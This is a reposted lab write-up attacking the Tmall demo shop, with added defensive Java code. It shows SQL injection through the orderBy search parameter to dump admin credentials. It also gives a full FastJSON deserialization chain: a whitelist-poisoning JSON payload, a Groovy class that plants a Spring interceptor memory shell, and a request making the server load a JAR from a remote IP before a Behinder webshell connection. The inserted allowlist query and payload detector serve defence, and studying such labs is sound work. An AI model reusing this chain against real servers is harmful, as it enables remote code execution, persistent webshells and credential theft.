Tmall Lab Write-up

Posted by admin on 19 May 2024, 02:05:53
I. SQL Injection Vulnerability

The search box on the home page is vulnerable to SQL injection.

The orderBy parameter turns out to be injectable.

SQLMap confirms the SQL injection.

Enumerate the database: tmalldemodb

Enumerate the tables

Dump the users

Recovered credentials: admin/rkmslmnncompilerinternal

Log in to the admin back end.
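
An ORDER BY column cannot be passed as a JDBC bind parameter, which is why orderBy-style parameters so often end up concatenated straight into the query, as in the Tmall search above. The following is an added defensive example, not code from the Tmall project or the original post: the search keyword travels as a bind value and the orderBy and direction values are resolved through allowlists; the table and column names are assumed, since the write-up does not show the schema.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Map;

/** Product search where the keyword is a bind parameter and orderBy is resolved through an allowlist. */
public final class SafeProductQuery {
    // Keys are the only values a client may send as orderBy; the column names on the right are
    // assumed for this example (the real Tmall schema is not shown in the write-up).
    private static final Map<String, String> ORDER_COLUMNS = Map.of(
            "name", "product_name", "price", "product_price", "date", "product_create_date");
    private static final String DEFAULT_ORDER = "product_id";

    /** Maps the client's orderBy value to a known column; anything else falls back to the default. */
    static String resolveOrderColumn(String orderBy) {
        if (orderBy == null) {
            return DEFAULT_ORDER;
        }
        return ORDER_COLUMNS.getOrDefault(orderBy.toLowerCase(), DEFAULT_ORDER);
    }

    /** Normalises the sort direction to exactly ASC or DESC; no other text can reach the query. */
    static String resolveDirection(String dir) {
        return "desc".equalsIgnoreCase(dir) ? "DESC" : "ASC";
    }

    /** Builds the SQL text. The only concatenated fragments come from the two allowlists above. */
    static String buildSql(String orderBy, String dir) {
        return "SELECT product_id, product_name, product_price FROM product "
                + "WHERE product_name LIKE ? "
                + "ORDER BY " + resolveOrderColumn(orderBy) + " " + resolveDirection(dir);
    }

    /** Executes the search; the keyword from the search box is a bind value, never SQL text. */
    public static ResultSet search(Connection conn, String keyword, String orderBy, String dir)
            throws SQLException {
        PreparedStatement ps = conn.prepareStatement(buildSql(orderBy, dir));
        ps.setString(1, "%" + keyword + "%");
        return ps.executeQuery();
    }

    public static void main(String[] args) {
        // An injection attempt in orderBy collapses to the default column instead of reaching the database.
        System.out.println(buildSql("product_name;--", "desc"));
        System.out.println(buildSql("price", "asc"));
    }
}
```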

II. FastJSON Vulnerability

1. Log in to the back end

The vulnerable function is All Products > Add a product.

The add-product page

Capturing the traffic: the request to http://192.168.0.104:8080/tmall/admin/product carries a propertyJson parameter that passes a JSON string to the back end, where it is parsed with FastJSON, so the FastJSON deserialization vulnerability applies.

Craft a malicious request:

The DNSLog platform receives a request, confirming the vulnerability.

2. Exploitation

2.1 Add the class to the whitelist

{
  "@type": "java.lang.Exception",
  "@type": "org.codehaus.groovy.control.CompilationFailedException",
  "unit": {}
}

2.2 Build the malicious JAR

JAR template: https://github.com/Lonely-night/fastjsonVul/

Add the dependencies:

<dependencies>
    <dependency>
        <groupId>org.codehaus.groovy</groupId>
        <artifactId>groovy-all</artifactId>
        <version>3.0.1</version>
        <scope>provided</scope>
        <type>pom</type>
    </dependency>
    <dependency>
        <groupId>org.springframework</groupId>
        <artifactId>spring-webmvc</artifactId>
        <version>5.1.7.RELEASE</version>
    </dependency>
    <dependency>
        <groupId>javax.servlet</groupId>
        <artifactId>javax.servlet-api</artifactId>
        <version>4.0.1</version>
        <scope>provided</scope>
    </dependency>
</dependencies>

Create the malicious class GrabAnnotationTransformation2:

package groovy.grape;

import org.codehaus.groovy.ast.ASTNode;
import org.codehaus.groovy.control.CompilePhase;
import org.codehaus.groovy.control.SourceUnit;
import org.codehaus.groovy.transform.ASTTransformation;
import org.codehaus.groovy.transform.GroovyASTTransformation;
import sun.misc.BASE64Decoder;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import org.springframework.web.servlet.support.RequestContextUtils;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.List;

@GroovyASTTransformation(phase = CompilePhase.CONVERSION)
public class GrabAnnotationTransformation2 implements ASTTransformation {
    public GrabAnnotationTransformation2() {
        try {
            // Get the current application context
            WebApplicationContext context = RequestContextUtils.findWebApplicationContext(
                    ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());
            // Obtain the RequestMappingHandlerMapping bean from the context
            RequestMappingHandlerMapping mapping = context.getBean(RequestMappingHandlerMapping.class);
            ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
            Class clazz = null;
            try {
                clazz = classLoader.loadClass("com.feihong.ldap.template.DynamicFilterTemplate");
            } catch (ClassNotFoundException e) {
                try {
                    BASE64Decoder base64Decoder = new BASE64Decoder();
                    // The original post embeds the compiled interceptor class here as a long base64 string;
                    // the blob is omitted from this record.
                    String codeClass = "<base64-encoded class bytes omitted>";
                    byte[] bytes = base64Decoder.decodeBuffer(codeClass);
                    Method method = null;
                    Class clz = classLoader.getClass();
                    while (method == null && clz != Object.class) {
                        try {
                            method = clz.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
                        } catch (NoSuchMethodException ex) {
                            clz = clz.getSuperclass();
                        }
                    }
                    method.setAccessible(true);
                    clazz = (Class) method.invoke(classLoader, bytes, 0, bytes.length);
                } catch (Exception ex) {
                    //continue;
                }
            }
            Field f = null;
            f = mapping.getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredField("adaptedInterceptors");
            f.setAccessible(true);
            List<HandlerInterceptor> list = null;
            list = (List<HandlerInterceptor>) f.get(mapping);
            //list.add((HandlerInterceptor) DynamicUtils.getClass(INTERCEPTOR_CLASS_STRING).newInstance());
            list.add((HandlerInterceptor) clazz.newInstance());
        } catch (Exception e) {
        }
    }

    @Override
    public void visit(ASTNode[] nodes, SourceUnit source) {
    }
}

Create the file:

META-INF/services/org.codehaus.groovy.transform.ASTTransformation

with the content:

groovy.grape.GrabAnnotationTransformation2

Directory layout: (screenshot in the original post)

Package the JAR and upload it to a cloud server.

3. Attack

Start an HTTP server in the directory containing attack.jar.

Craft and send the request:

{
  "@type": "org.codehaus.groovy.control.ProcessingUnit",
  "@type": "org.codehaus.groovy.tools.javac.JavaStubCompilationUnit",
  "config": {
    "@type": "org.codehaus.groovy.control.CompilerConfiguration",
    "classpathList": ["http://101.43.35.33/attack-1.jar"]
  }
}

The cloud server receives the request.

Connect with 冰蝎 (Behinder).
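
Both payloads in this section share observable traits: an @type key (FastJSON's autotype marker), two @type keys in one object (the pattern the whitelist step relies on), a class name from the Groovy compiler, and a CompilerConfiguration classpathList pointing at a remote URL. The following is an added detection example, not code from the Tmall project or the original post: it inspects the raw request body so that duplicate keys, which a JSON parser would silently collapse, are still counted; the sample bodies are constructed and the host in them is a placeholder.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Heuristic inspection of a request body (e.g. propertyJson) for FastJSON autotype abuse. */
public final class FastjsonBodyInspector {
    // Matched on the raw text so that duplicate keys, which JSON parsers collapse, are still counted.
    private static final Pattern TYPE_KEY = Pattern.compile("\"@type\"\\s*:\\s*\"([^\"]*)\"");
    // A CompilerConfiguration classpath entry that is a URL is what lets the Groovy chain load remote code.
    private static final Pattern REMOTE_CLASSPATH = Pattern.compile("\"classpathList\"\\s*:\\s*\\[[^\\]]*\"(https?|ldap|rmi)://");

    /** Returns findings for one body; an empty list means nothing suspicious was seen. */
    public static List<String> inspect(String body) {
        List<String> findings = new ArrayList<>();
        List<String> types = new ArrayList<>();
        Matcher m = TYPE_KEY.matcher(body);
        while (m.find()) {
            types.add(m.group(1));
        }
        if (!types.isEmpty()) {
            findings.add("@type autotype marker present: " + types);
        }
        if (types.size() > 1) {
            // Two @type keys in one object is the expectClass trick used above to get a class whitelisted.
            findings.add("multiple @type keys in one body (expectClass / whitelist-poisoning pattern)");
        }
        for (String t : types) {
            if (t.startsWith("org.codehaus.groovy.")) {
                findings.add("Groovy compiler class referenced: " + t);
            }
        }
        if (REMOTE_CLASSPATH.matcher(body).find()) {
            findings.add("classpathList points at a remote URL");
        }
        return findings;
    }

    public static void main(String[] args) {
        // Constructed sample modelled on the payload above; the host is a placeholder, not the original address.
        String attack = "{\"@type\":\"org.codehaus.groovy.control.ProcessingUnit\","
                + "\"@type\":\"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit\","
                + "\"config\":{\"@type\":\"org.codehaus.groovy.control.CompilerConfiguration\","
                + "\"classpathList\":[\"http://attacker.example/attack-1.jar\"]}}";
        String benign = "{\"color\":\"red\",\"size\":\"XL\"}"; // constructed ordinary propertyJson value
        System.out.println("attack -> " + inspect(attack));
        System.out.println("benign -> " + inspect(benign));
    }
}
```

On the application side the matching fix is to keep autotype disabled (ParserConfig.getGlobalInstance().setSafeMode(true) in FastJSON 1.2.68 and later) and to parse propertyJson into a fixed class rather than into Object.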

Originally published on the WeChat official account 白给信安: Tmall 靶场记录

Reposted at CN-SEC中文网: https://cn-sec.com/archives/2033050.html
